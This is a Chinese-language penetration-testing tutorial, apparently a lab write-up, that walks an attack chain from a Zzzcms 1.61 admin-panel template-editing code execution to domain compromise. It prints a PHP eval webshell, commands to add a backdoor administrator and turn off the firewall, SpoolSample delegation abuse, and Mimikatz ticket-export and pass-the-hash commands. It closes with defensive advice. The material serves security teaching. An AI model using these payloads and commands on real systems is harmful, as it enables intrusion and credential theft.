Zzzcms 1.61 渗透测试实战教学文档<\/h1>

信息收集阶段<\/h2>

初始扫描<\/strong><\/p>

使用fscan进行全端口扫描，识别开放服务<\/li>
发现存在一个基于Zzzcms的网站<\/li> <\/ul> <\/li>

CMS识别<\/strong><\/p>

确认CMS版本为Zzzcms 1.61<\/li>
该版本存在已知的后台远程命令执行漏洞<\/li> <\/ul> <\/li> <\/ol>
漏洞利用<\/h2>
Zzzcms 1.61 后台远程命令执行漏洞<\/h3>

初始访问<\/strong><\/p>

使用弱口令组合：admin\/admin123456<\/code> 成功登录后台<\/li> <\/ul> <\/li>
漏洞利用步骤<\/strong><\/p> 进入"本地模板管理"功能<\/li> 找到并编辑search.html<\/code>模板文件<\/li> 修改内容为PHP代码（如<?php phpinfo();?><\/code>）<\/li> 保存后访问相应页面验证代码执行<\/li> <\/ul> <\/li> WebShell植入<\/strong><\/p> 将模板内容替换为一句话木马（如<?php eval($_POST['cmd']);?><\/code>）<\/li> 使用蚁剑等工具尝试连接（注意：实际环境中可能因杀软拦截而失败）<\/li> <\/ul> <\/li> <\/ol> 内网渗透<\/h2> 横向移动技术<\/h3> 代理搭建<\/strong><\/p> 使用Stowaway代理工具建立内网通道<\/li> 通过代理上传免杀木马文件<\/li> <\/ul> <\/li> 权限提升<\/strong><\/p> 使用"土豆"提权工具获取系统权限<\/li> 执行命令： net user hacker P@ssw0rd \/add <\/span><\/span>net localgroup administrators hacker \/add <\/span><\/span>netsh advfirewall set allprofiles state off <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> 内网信息收集<\/strong><\/p> 检查网络配置：ipconfig \/all<\/code><\/li> 扫描C段（如10.5.5.0\/24）<\/li> 发现10.5.5.33主机开放3389端口<\/li> <\/ul> <\/li> 凭证爆破<\/strong><\/p> 使用爆破工具尝试RDP登录<\/li> 成功凭证：administrator\/admin@123456<\/code><\/li> <\/ul> <\/li> <\/ol> 域渗透技术<\/h2> 域信息收集<\/strong><\/p> 使用CS的svc-exe提权到SYSTEM<\/li> 执行命令收集域信息： net group "Domain Admins"<\/span> \/domain <\/span><\/span>net group "Domain Computers"<\/span> \/domain <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> 非约束委派利用<\/strong><\/p> 发现cyberweb<\/code>主机配置了非约束委派<\/li> 利用打印机漏洞（SpoolSample）强制域控访问受控主机<\/li> 使用工具： .\SpoolSample.exe DC01 WEB01 <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> 凭证窃取<\/strong><\/p> 使用Mimikatz导出域控的NTLM哈希： mimikatz.exe "sekurlsa::tickets \/export"<\/span> <\/span><\/span><\/code><\/pre><\/li> 执行Pass-the-Hash攻击： mimikatz.exe "sekurlsa::pth \/user:Administrator \/domain:cyberlab \/ntlm:<hash>"<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> <\/ol> 参考资源<\/h2> Zzzcms漏洞分析：<\/p> https:\/\/xz.aliyun.com\/news\/4103<\/li> https:\/\/zhuanlan.zhihu.com\/p\/58909740<\/li> <\/ul> <\/li> 非约束委派利用：<\/p> https:\/\/forum.butian.net\/share\/1591<\/li> <\/ul> <\/li> <\/ol> 防御建议<\/h2> 针对Zzzcms<\/strong><\/p> 及时升级到最新版本<\/li> 修改默认管理员密码为强密码<\/li> 限制后台模板编辑权限<\/li> <\/ul> <\/li> 内网防护<\/strong><\/p> 启用防火墙并配置严格规则<\/li> 监控异常账户添加行为<\/li> 禁用非必要的委派配置<\/li> <\/ul> <\/li> 域安全<\/strong><\/p> 定期检查域内委派配置<\/li> 监控Kerberos认证异常<\/li> 启用LSA保护防止凭据窃取<\/li> <\/ul> <\/li> <\/ol> 本教学文档完整呈现了从外网渗透到域控控制的完整攻击链，重点突出了Zzzcms漏洞利用、内网横向移动和域渗透技术的关键步骤。<\/p>